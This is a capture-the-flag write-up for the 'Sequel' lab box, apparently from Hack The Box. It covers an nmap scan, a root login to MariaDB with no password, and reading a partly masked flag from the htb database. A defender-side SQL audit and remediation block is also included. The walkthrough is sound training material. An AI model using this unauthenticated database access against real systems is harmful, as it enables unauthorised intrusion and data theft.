Sequel
Resolution summary
- MariaDB was set up with no authentication: login as root with no password.
Improved skills
- Using an Nmap script (mysql-info) to spot a vulnerability quickly
Used tools
- nmap
- mysql cli
Information Gathering
Nmap Scan
# Nmap 7.93 scan initiated Wed Mar 15 09:44:32 2023 as: nmap -sC -oA nmap/nmap 10.129.204.145
Nmap scan report for 10.129.204.145
Host is up (0.052s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 86
| Capabilities flags: 63486
| Some Capabilities: FoundRows, ODBCClient, LongColumnFlag, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: {v_WwrW<fkfAPP|DyZ3/
|_ Auth Plugin Name: mysql_native_password
# Nmap done at Wed Mar 15 09:45:17 2023 -- 1 IP address (1 host up) scanned in 45.07 seconds
Enumeration
Port 3306 - MariaDB / Mysql
MariaDB was set up with no password and used the mysql_native_password plugin. More info here: https://mariadb.com/kb/en/authentication-plugin-mysql_native_password/
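As an added defender-side check (not part of the original writeup), the following queries audit a MariaDB 10.3 instance (the version nmap reported) for accounts that can log in with an empty credential, and show the remediation. The account name and password value in the ALTER/DROP statements are placeholders.

```sql
-- Added audit example, not from the writeup. Run as an administrative
-- account on MariaDB 10.3; in 10.4+ mysql.user is a view, so query
-- mysql.global_priv there instead.

-- 1. Accounts with no credential at all: empty Password hash and empty
--    authentication_string, using native password auth. These log in
--    exactly as root did on this box. unix_socket accounts legitimately
--    have an empty hash (they authenticate via the OS socket), so they
--    are excluded here.
SELECT User, Host, plugin
FROM mysql.user
WHERE (Password = '' OR Password IS NULL)
  AND (authentication_string = '' OR authentication_string IS NULL)
  AND plugin IN ('', 'mysql_native_password');

-- 2. Accounts reachable from any host ('%'). This matters because the
--    server listens on the network interface rather than only localhost.
SELECT User, Host, plugin
FROM mysql.user
WHERE Host = '%';

-- 3. Is the listener exposed beyond loopback? 0.0.0.0 or :: means yes.
SHOW VARIABLES LIKE 'bind_address';

-- 4a. Remediation, option A: give the offending account a real password.
--     'root'@'%' and the password below are placeholders.
ALTER USER 'root'@'%' IDENTIFIED BY 'CHANGE-ME-use-a-strong-password';

-- 4b. Remediation, option B (preferred): no remote root at all; keep
--     root limited to localhost and drop the wildcard-host entry.
-- DROP USER IF EXISTS 'root'@'%';

-- 5. Re-run the first query afterwards; it should return no rows.
FLUSH PRIVILEGES;
```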
Exploitation
No auth
Enumeration showed the mysql_native_password plugin with no password set. Login was simple:
Traversing the database allowed us to find the flag easily in the htb database.
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.050 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4b**********15da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)
MariaDB [htb]>
Lateral Movement to user
Not required for the flag.
Privilege Escalation
Not required for the flag.
Trophy & Loot
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 5 | flag | 7b4b**********15da8 |